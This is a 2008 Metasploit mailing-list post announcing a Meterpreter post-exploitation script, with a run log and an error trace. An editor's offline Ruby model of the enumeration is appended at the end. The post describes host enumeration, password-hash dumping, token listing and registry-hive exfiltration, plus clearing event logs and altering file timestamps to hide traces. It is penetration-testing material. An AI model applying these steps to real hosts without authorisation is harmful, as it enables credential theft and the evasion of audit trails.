Metasploit mailing list archives

Script for automating Information Gathering in windows Hosts


From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 21:18:46 +0000

Hi

   Guys, I just re-wrote a script I wrote during an engagement, inspired by the
scraper.rb script by Muts, and thought I would share it with you. Sadly
I'm getting the same error as Natron when running my script with
AutoRunScript. At the end of the email is the error I'm getting in
.msf3/log/framework.log.

http://www.darkoperator.com/winenum2.rb.tar.gz

The script has to be placed in the scripts/meterpreter/ folder in the root
of the Metasploit folder in order to use it.
The script will do the following:

Execute on the host and get the output for:

    * set
    * arp -a
    * ipconfig /all
    * ipconfig /displaydns
    * route print
    * net view
    * netstat -na
    * netstat -ns
    * net share
    * net group
    * net user
    * net localgroup
    * net view /domain
    * tasklist /svc
    * netsh firewall show config
    * wmic computersystem list
    * wmic useraccount list
    * wmic group
    * wmic service list brief
    * wmic volume list brief
    * wmic process list brief
    * wmic startup list full
    * wmic qfe

It will also:
    * Check if the target machine is a VMware or VirtualBox VM
    * Run meterpreter hashdump
    * List all tokens on the server that can be used with Incognito
    * Export, compress and download all registry hives
    * Clear all event logs (optional)
    * Change the MACE of the executables used on the host (optional)

Here is some output from Meterpreter:

meterpreter > run winenum2
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage:

-h    This help message.

-a    Run all commands including clearing event log and changing the
      Changing Access Time, Modified Time and Created Time of executables
      that where run on the target machine

-m    Run all commands minus clearing the event logs and changing the MACE
      of executables that where run in the target machine.
meterpreter >
meterpreter > run winenum2 -a
[*] Running Windows Local Enumeration Meterpreter Script by Darkoperator
[*] New session on 10.10.10.23:1149...
[*] Saving report to /tmp/10.10.10.23_20081130.270505021
[*] Checking if WINXPVM01 is a Virtual Machine ........
[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -na
[*]     running command netstat -ns
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net localgroup
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command tasklist /svc
[*] Running WMIC Commands ....
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group
[*]     running command wimic service list brief
[*]     running command wimic volume list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*]     Exporting HKCU
[*]     Compressing HKCU into cab file for faster download
[*]     Exporting HKLM
[*]     Compressing HKLM into cab file for faster download
[*]     Exporting HKCC
[*]     Compressing HKCC into cab file for faster download
[*]     Exporting HKCR
[*]     Compressing HKCR into cab file for faster download
[*]     Exporting HKU
[*]     Compressing HKU into cab file for faster download
[*]     Downloading HKCU.cab to -> /tmp/HKCU.cab
[*]     Downloading HKLM.cab to -> /tmp/HKLM.cab
[*]     Downloading HKCC.cab to -> /tmp/HKCC.cab
[*]     Downloading HKCR.cab to -> /tmp/HKCR.cab
[*]     Downloading HKU.cab to -> /tmp/HKU.cab
[*]     Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*]     Clearing the security Event Log
[*]     Clearing the system Event Log
[*]     Clearing the application Event Log
[*]     Clearing the directory service Event Log
[*]     Clearing the dns server Event Log
[*]     Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!


-----------------Error when running in AutoRunScript
--------------------------------------

[12/14/2008 17:04:14] [e(0)] core: Exception raised from handle_connection: undefined local variable or method `client' for #<#<Class:0xb65748cc>:0xb6214c18>

/pentest/exploits/framework3/lib/rex/script.rb:35:in `eval'
(eval):474:in `on_session'
(eval):88:in `on_session'
/pentest/exploits/framework3/lib/msf/core/handler.rb:202:in `create_session'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:128:in `handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/windows/dllinject.rb:231:in `handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:119:in `handle_connection'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:129:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/exploit.rb:401:in `setup'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:173:in `job_run_proc'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:144:in `run'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:121:in `exploit_simple'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:142:in `exploit_simple'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:118:in `cmd_exploit'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:78
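Editor's added example (this is not winenum2.rb and not Carlos's code): a small Ruby model of the enumeration flow the post describes, runnable offline against a constructed fake session instead of a Meterpreter `client`. The two command lists are copied from the post; the VM heuristic (matching the Manufacturer/Model strings that `wmic computersystem list` prints), the report path layout, the `reg export` / `makecab` command pair and its C:\WINDOWS\Temp working directory, and the rule used to derive the list of touched host binaries are all assumptions, not what the script itself does.

```ruby
# Added example, not the winenum2.rb script from the post. Models the flow the
# post describes (command list, VM check, report file, registry export plus
# makecab, and the set of host binaries a run touches) against a constructed
# fake session so it runs offline.
require 'tmpdir'

# Command list from the post. "set" is a cmd.exe builtin, so it needs cmd.exe /c.
ENUM_COMMANDS = [
  'cmd.exe /c set', 'arp -a', 'ipconfig /all', 'ipconfig /displaydns',
  'route print', 'net view', 'netstat -na', 'netstat -ns', 'net share',
  'net group', 'net user', 'net localgroup', 'net view /domain',
  'netsh firewall show config', 'tasklist /svc'
].freeze

WMIC_COMMANDS = [
  'wmic computersystem list', 'wmic useraccount list', 'wmic group',
  'wmic service list brief', 'wmic volume list brief',
  'wmic process list brief', 'wmic startup list full', 'wmic qfe'
].freeze

# Stand-in for the Meterpreter `client` object: a constructed hash of
# command => canned output (assumption; a real script would execute the
# command through the session and read its stdout).
class FakeSession
  attr_reader :host
  def initialize(host, outputs)
    @host = host
    @outputs = outputs
  end

  def run_cmd(cmd)
    @outputs.fetch(cmd) { "#{cmd}: (no output captured)" }
  end
end

# Assumed VM heuristic (not necessarily what winenum2 uses): look at the
# Manufacturer/Model strings that `wmic computersystem list` prints.
def vm_vendor(wmic_computersystem_output)
  text = wmic_computersystem_output.downcase
  return 'VMware'     if text.include?('vmware')
  return 'VirtualBox' if text.include?('virtualbox') || text.include?('innotek')
  nil
end

# Report path in the post's shape: <dir>/<host>_<timestamp> (format assumed).
def report_path(host, now = Time.now, dir = Dir.tmpdir)
  File.join(dir, "#{host}_#{now.strftime('%Y%m%d.%H%M%S')}")
end

# Commands for one registry hive: export with reg.exe, then compress with
# makecab.exe (the two extra binaries in the post's MACE list). Assumed paths.
def registry_export_commands(hive, workdir = 'C:\\WINDOWS\\Temp')
  reg = "#{workdir}\\#{hive}.reg"
  cab = "#{workdir}\\#{hive}.cab"
  ["reg export #{hive} #{reg}", "makecab #{reg} #{cab}"]
end

# Host binaries a run touches, derived from the command list plus the registry
# step; this is the set whose MACE values a `-a` style run would have to reset.
def touched_binaries(commands, extra = %w[reg.exe makecab.exe])
  bins = commands.map do |c|
    exe = c.split.first.downcase
    exe += '.exe' unless exe.end_with?('.exe')
    exe == 'wmic.exe' ? 'wbem\\wmic.exe' : exe
  end
  (bins + extra).uniq
end

# Runs every command and writes one sectioned report file; returns its path.
def enumerate(session, report)
  File.open(report, 'w') do |f|
    f.puts "Host: #{session.host}"
    vendor = vm_vendor(session.run_cmd('wmic computersystem list'))
    f.puts(vendor ? "VM: #{vendor}" : 'VM: not detected')
    (ENUM_COMMANDS + WMIC_COMMANDS).each do |cmd|
      f.puts "===== #{cmd} ====="
      f.puts session.run_cmd(cmd)
    end
  end
  report
end

# Constructed sample output (not captured from a real host) for two commands.
def sample_session
  FakeSession.new('10.10.10.23',
    'wmic computersystem list' =>
      "Manufacturer=VMware, Inc.\nModel=VMware Virtual Platform\nName=WINXPVM01",
    'net user' => "User accounts for \\\\WINXPVM01\n\nAdministrator  Guest")
end

if __FILE__ == $PROGRAM_NAME
  path = enumerate(sample_session, report_path('10.10.10.23'))
  puts "report written to #{path}"
  puts touched_binaries(ENUM_COMMANDS + WMIC_COMMANDS).join(', ')
end
```

Against a live session, run_cmd is the only piece that changes: it would call the session's process-execution API and collect stdout, and the rest of the loop stays the same. Two practitioner caveats: the event-log clearing the post offers under -a is destructive and is deliberately left out of this model, and the post's note that clearing leaves event 517 applies to the XP/2003 security log; on Vista and later the equivalent "audit log was cleared" record is event 1102.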